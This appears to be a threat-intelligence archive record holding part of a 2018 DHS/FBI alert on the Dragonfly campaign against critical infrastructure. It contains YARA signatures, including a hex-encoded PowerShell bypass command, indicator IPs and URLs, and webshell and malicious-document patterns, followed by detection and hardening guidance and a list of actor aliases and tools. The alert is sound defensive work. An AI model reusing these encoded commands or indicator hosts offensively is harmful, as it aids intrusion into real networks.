22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }\r\n            $s14 = {\r\n68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E\r\n}\r\n            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }\r\n//inveigh pentesting tools\r\n            $s16 = {\r\n24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65\r\n}\r\n//specific malicious word document PK archive\r\n            $s17 = {\r\n2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B\r\n}\r\n            $s18 = {\r\n6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4\r\n}\r\n            $s19 = {\r\n8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39\r\n}\r\n            $s20 = {\r\n8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4\r\n}\r\n            $s21 = {\r\n8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4\r\n}\r\n            $s22 = \"5.153.58.45\"\r\n            $s23 = \"62.8.193.206\"\r\n            $s24 = \"/1/ree_stat/p\"\r\n            $s25 = \"/icon.png\"\r\n            $s26 = \"/pshare1/icon\"\r\n            $s27 = \"/notepad.png\"\r\n            $s28 = \"/pic.png\"\r\n            $s29 = \"http://bit.ly/2m0x8IH\"\r\ncondition:\r\n            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or\r\n($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or\r\n$s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or 
($s0 and $s23 or $s28) or ($s29)\r\n}\r\nrule APT_malware_2\r\n{\r\nmeta:\r\n      description = \"rule detects malware\"\r\n      author = \"other\"\r\nstrings:\r\n      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }\r\n      $http_push = \"X-mode: push\" nocase\r\n      $http_pop = \"X-mode: pop\" nocase\r\ncondition:\r\n      any of them\r\n}\r\nrule Query_XML_Code_MAL_DOC_PT_2\r\n{\r\nmeta:\r\n     name= \"Query_XML_Code_MAL_DOC_PT_2\"\r\n     author = \"other\"\r\nstrings:\r\n            $zip_magic = { 50 4b 03 04 }\r\n            $dir1 = \"word/_rels/settings.xml.rels\"\r\n            $bytes = {8c 90 cd 4e eb 30 10 85 d7}\r\ncondition:\r\n            $zip_magic at 0 and $dir1 and $bytes\r\n}\r\nrule Query_Javascript_Decode_Function\r\n{\r\nmeta:\r\n      name= \"Query_Javascript_Decode_Function\"\r\n      author = \"other\"\r\nstrings:\r\n      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22\r\n29 3B}\r\n      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66\r\n67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64\r\n65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}\r\n      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26\r\n33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21\r\n3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}\r\n      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 
2E 6C 65 6E 67 74 68 29}\r\n      $func_call=\"a(\\\"\"\r\ncondition:\r\n      filesize \u003c 20KB and #func_call \u003e 20 and all of ($decode*)\r\n}\r\nrule Query_XML_Code_MAL_DOC\r\n{\r\nmeta:\r\n      name= \"Query_XML_Code_MAL_DOC\"\r\n      author = \"other\"\r\nstrings:\r\n      $zip_magic = { 50 4b 03 04 }\r\n      $dir = \"word/_rels/\" ascii\r\n      $dir2 = \"word/theme/theme1.xml\" ascii\r\n      $style = \"word/styles.xml\" ascii\r\ncondition:\r\n      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd\r\n}\r\nrule z_webshell\r\n{\r\nmeta:\r\n            description = \"Detection for the z_webshell\"\r\n            author = \"DHS NCCIC Hunt and Incident Response Team\"\r\n            date = \"2018/01/25\"\r\n            md5 =  \"2C9095C965A55EFC46E16B86F9B7D6C6\"\r\nstrings:\r\n            $aspx_identifier1 = \"\u003c%@ \" nocase ascii wide\r\n            $aspx_identifier2 = \"\u003casp:\" nocase ascii wide\r\n            $script_import = /(import|assembly) Name(space)?\\=\\\"(System|Microsoft)/ nocase ascii wide\r\n            $case_string = /case \\\"z_(dir|file|FM|sql)_/ nocase ascii wide\r\n            $webshell_name = \"public string z_progname =\" nocase ascii wide\r\n            $webshell_password = \"public string Password =\" nocase ascii wide\r\ncondition:\r\n            1 of ($aspx_identifier*)\r\n            and #script_import \u003e 10\r\n            and #case_string \u003e 7\r\n            and 2 of ($webshell_*)\r\n            and filesize \u003c 100KB\r\n}\r\nImpact\r\nThis actor’s campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical\r\nmanufacturing sectors.\r\nSolution\r\nDHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to 
help\r\ndefend against this activity.\r\nNetwork and Host-based Signatures\r\nDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and\r\nSnort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their\r\norganization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious\r\nactivity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated\r\nYARA and .txt file to identify malicious activity.\r\nDetections and Prevention Measures\r\nUsers and administrators may detect spear phishing, watering hole, web shell, and remote access activity by\r\ncomparing all IP addresses and domain names listed in the IOC packages to the following locations:\r\nnetwork intrusion detection system/network intrusion prevention system logs,\r\nweb content logs,\r\nproxy server logs,\r\ndomain name server resolution logs,\r\npacket capture (PCAP) repositories,\r\nfirewall logs,\r\nworkstation Internet browsing history logs,\r\nhost-based intrusion detection system/host-based intrusion prevention system (HIPS) logs,\r\ndata loss prevention logs,\r\nExchange server logs,\r\nuser mailboxes,\r\nmail filter logs,\r\nmail content logs,\r\nAV mail logs,\r\nOWA logs,\r\nBlackBerry Enterprise Server logs, and\r\nMobile Device Management logs.\r\nTo detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes\r\nlisted in the IOC packages with the following locations:\r\napplication logs,\r\nIIS/Apache logs,\r\nfile system,\r\nintrusion detection system/intrusion prevention system logs,\r\nPCAP repositories,\r\nfirewall logs, and\r\nreverse proxy.\r\nDetect spear-phishing by searching workstation file systems and network-based user directories for attachment\r\nfilenames and hashes found in the IOC 
packages.\r\nDetect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.\r\nDetect the actors’ evasion techniques by identifying deleted logs. This can be done by reviewing last-seen entries\r\nand by searching for Event ID 104 in Windows System logs.\r\nDetect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially\r\nthose created recently.\r\nDetect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for\r\nall users. Any unusual login times should be reviewed by the account owners.\r\nDetect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s\r\ncredentials suspected to be compromised.\r\nDetect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.\r\nDetect spear-phishing through a network by validating all new email accounts created on mail servers, especially\r\nthose with external user access.\r\nDetect persistence on servers by searching system logs for all filenames listed in the IOC packages.\r\nDetect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1”\r\ncontained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior\r\nto the activity.)\r\nDetect persistence by reviewing all installed applications on critical systems for unauthorized applications,\r\nnoting specifically FortiClient VPN and Python 2.7.\r\nDetect persistence by searching for the value of “REG_DWORD 100” at registry location\r\n“HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\MaxInstanceCount” and the value of\r\n“REG_DWORD 1” at location\r\n“HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\dontdisplaylastusername”.\r\nDetect installation by searching all proxy logs for downloads from URIs without domain names.\r\nGeneral Best Practices Applicable to this Campaign:\r\nPrevent external communication of all versions of SMB and related protocols at the network boundary by blocking\r\nTCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best\r\nPractices for more information.\r\nBlock the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the\r\nnetwork.\r\nMonitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple\r\nconcurrent logins).\r\nDeploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources,\r\nand addresses; block these before receiving and downloading messages. This action will help to reduce the attack\r\nsurface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at\r\nthe mail gateway) with a reputable anti-virus solution that includes cloud reputation services.\r\nSegment any critical networks or control systems from business systems and networks according to industry best\r\npractices.\r\nEnsure adequate logging and visibility on ingress and egress points.\r\nEnsure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide\r\nadequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging,\r\nscript block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and\r\nanalysis. 
See the FireEye blog post Greater Visibility through PowerShell Logging for more information.\r\nImplement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A –\r\nCompromised Web Servers and Web Shells – Threat Awareness and Guidance.\r\nEstablish a training mechanism to inform end users on proper email and web usage, highlighting current information\r\nand analysis, and including common indicators of phishing. End users should have clear instructions on how to report\r\nunusual or suspicious emails.\r\nImplement application directory whitelisting. System administrators may implement application or application\r\ndirectory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults\r\nallow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software\r\nfolders. All other locations should be disallowed unless an exception is granted.\r\nBlock RDP connections originating from untrusted external addresses unless an exception exists; routinely review\r\nexceptions for validity.\r\nStore system logs of mission-critical systems for at least one year within a security information and event management\r\n(SIEM) tool.\r\nEnsure applications are configured to log the proper level of detail for an incident response investigation.\r\nConsider implementing HIPS or other controls to prevent unauthorized code execution.\r\nEstablish least-privilege controls.\r\nReduce the number of Active Directory domain and enterprise administrator accounts.\r\nBased on the suspected level of compromise, reset all user, administrator, and service account credentials across all\r\nlocal and domain systems.\r\nEstablish a password policy to require complex passwords for all users.\r\nEnsure that accounts 
for network administration do not have external connectivity.\r\nEnsure that network administrators use non-privileged accounts for email and Internet access.\r\nUse two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and\r\nhigh-risk environments (e.g., remote access, privileged access, and access to sensitive data).\r\nImplement a process for logging and auditing activities conducted by privileged accounts.\r\nEnable logging and alerting on privilege escalations and role changes.\r\nPeriodically conduct searches of publicly available information to ensure no sensitive information has been\r\ndisclosed. Review photographs and documents for sensitive data that may have inadvertently been included.\r\nAssign sufficient personnel to review logs, including records of alerts.\r\nComplete an independent security (as opposed to compliance) risk review.\r\nCreate and participate in information sharing programs.\r\nCreate and maintain network and system documentation to aid in timely incident response. Documentation should\r\ninclude network diagrams, asset owners, type of asset, and an incident response plan.\r\nReport Notice\r\nDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to\r\nDHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at\r\nNCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber\r\nDivision (CyWatch@fbi.gov or 855-292-3937).\r\nReferences\r\n[1] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.\r\n[2] CERT CC. 
Vulnerability Note #672268\r\nRevisions\r\nMarch 15, 2018: Initial Version\r\nSource: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors"
	],
	"report_names": [
		"russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors"
	],
	"threat_actors": [
		{
			"id": "649b5b3e-b16e-44db-91bc-ae80b825050e",
			"created_at": "2022-10-25T15:50:23.290412Z",
			"updated_at": "2026-04-10T02:00:05.257022Z",
			"deleted_at": null,
			"main_name": "Dragonfly",
			"aliases": [
				"TEMP.Isotope",
				"DYMALLOY",
				"Berserk Bear",
				"TG-4192",
				"Crouching Yeti",
				"IRON LIBERTY",
				"Energetic Bear",
				"Ghost Blizzard"
			],
			"source_name": "MITRE:Dragonfly",
			"tools": [
				"MCMD",
				"Impacket",
				"CrackMapExec",
				"Backdoor.Oldrea",
				"Mimikatz",
				"PsExec",
				"Trojan.Karagany",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "90307967-d5eb-4b7b-b8de-6fa2089a176e",
			"created_at": "2022-10-25T15:50:23.501119Z",
			"updated_at": "2026-04-10T02:00:05.347826Z",
			"deleted_at": null,
			"main_name": "Dragonfly 2.0",
			"aliases": [
				"Dragonfly 2.0",
				"IRON LIBERTY",
				"DYMALLOY",
				"Berserk Bear"
			],
			"source_name": "MITRE:Dragonfly 2.0",
			"tools": [
				"netsh",
				"Impacket",
				"MCMD",
				"CrackMapExec",
				"Trojan.Karagany",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025",
			"created_at": "2022-10-25T16:07:23.386907Z",
			"updated_at": "2026-04-10T02:00:04.576815Z",
			"deleted_at": null,
			"main_name": "Berserk Bear",
			"aliases": [
				"Berserk Bear",
				"Dragonfly 2.0",
				"Dymalloy",
				"G0074"
			],
			"source_name": "ETDA:Berserk Bear",
			"tools": [
				"Fuerboos",
				"Goodor",
				"Impacket",
				"Karagany",
				"Karagny",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Phishery",
				"Trojan.Karagany",
				"Trojan.Phisherly",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434819,
	"ts_updated_at": 1775792184,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.pdf",
		"text": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.txt",
		"img": "https://archive.orkl.eu/08b57e20c50b48753f3f067341d566a8a7b90304.jpg"
	}
}